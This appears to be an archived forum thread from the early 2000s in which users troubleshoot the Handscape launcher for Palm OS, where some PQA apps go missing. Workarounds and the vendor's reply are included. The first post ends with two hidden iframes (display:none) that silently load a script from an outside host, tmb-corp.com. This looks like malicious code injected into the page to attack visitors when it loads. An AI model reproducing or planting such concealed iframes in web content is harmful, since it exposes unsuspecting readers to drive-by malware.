+ Reply to Thread
Results 1 to 10 of 10
  1. #1
    Registered User
    Join Date
    11-13-2001
    Location
    South Florida
    Posts
    281

    Anyone using Handscape?

    Hey gang. I have been trying out Handscape (by MobiMate) and am probably going to purchase it, but I noticed a few problems that I am hoping someone can confirm and possibly advise on.

    I noticed that certain PQA's just don't show up at all once installed. If I exit Handscape to the Palm OS, they do appear, but only under Palm OS. Some of these apps are:

    eBay PQA
    Amazon PQA
    PalmGear PQA (which locks the palm anyway)
    Yahoo PQA

    Anyone have any thoughts?


    Many thanks!

    Craig
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    01-08-2002
    Posts
    8
    I had a similar problem of stuff not showing up. Go to Categories, and see if those pqa's show up in the list with a blank after them. Assign them to a category and they should show up. (That's what I did, at least. I'm not sure if your situation is the same)

    blip

  3. #3
    Registered User
    Join Date
    11-13-2001
    Location
    South Florida
    Posts
    281
    Blip,

    I am not sure what you are referring to. Where is "categories"? Do you mean the tab called "All"? If so, every app should show up there, but these PQA's do not.

    Thanks for your help.

    Craig

  4. #4
    Old School mjorange's Avatar
    Join Date
    11-07-2001
    Location
    San Rafael
    Posts
    2,254
    I think Blip means for you to enter the main page menu by clicking the drop down menu. Once there, select "category" and the page should appear detailing each apps assigned category.

  5. #5
    Registered User
    Join Date
    11-13-2001
    Location
    South Florida
    Posts
    281
    I just figured out what Blip meant, and I did indeed try that. So far, that hasn't helped. Blip was right though -- the PQA's in question did in fact show up as "UNFILED".

    Craig

  6. #6
    Just another I300 User.
    Join Date
    01-12-2002
    Posts
    11
    I contacted Mobimate and asked the question, the response was...


    Dear Mate

    PQAs will be better supported on the next version which we'll release soon.

    Regards,

    Amir

    The MobiMate Team.

    Please visit us at : www.MobiMate.com

    They did let me know that a new version will be out soon and this will be corrected.

    The work around is currently is to delete the data files and restarting the handscape application *this is the same as reinstall* you will have to reconfigure Handscape, this finds all of the pqa's that are installed at run time - just don't install any more or you will have to install handscape all over again.

  7. #7
    Registered User
    Join Date
    11-13-2001
    Location
    South Florida
    Posts
    281
    Thanks for the update!

    Do you like Handscape? Any others you suggest?

  8. #8
    Just another I300 User.
    Join Date
    01-12-2002
    Posts
    11
    I enjoy Handscap's features, I've compared it to the Latest version of Silver Screen and an older version of Launcher, I like the fact that all my categories are across the top with Handscape, and I like being able to select an icon and have all the menu items right there (kind of like a windows left mouse click, which brings up a file menu). I wish they incorporated more of the icon change/edit and look and feel editing capabilities that Silver Screen has (like using font bucket and changing the system fonts), but as far as easy of use, I find it to be more intuitive than others and a little smaller on the memory.

    I'm hoping that Handscape's promise to better support PQAs and a few other fixes will be true, I'm now on the beta test list and the new version is do out soon, I'll keep you posted on enhancements and fixes.

  9. #9
    Registered User
    Join Date
    11-13-2001
    Location
    South Florida
    Posts
    281
    I agree with your assessment. I think it is a beautiful interface, and generaly quite intuitive. I did a complete uninstall, and then reinstalled, and all PQA's were found.

    I wrote the company yesterday indicating I was a trial user, and would probably buy based on their response to this problem. So far, I haven't heard from them. I hope this isn't an indication of their support, but they may chose to ignore me since I am not a registered user. We'll see.

    Craig

  10. #10
    Just another I300 User.
    Join Date
    01-12-2002
    Posts
    11
    I've noticed it takes a day or two for them to respond, the curses of a small company, the one guy who does all the user support most likely is coding and cleaning the restrooms . I'm sure they will respond.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts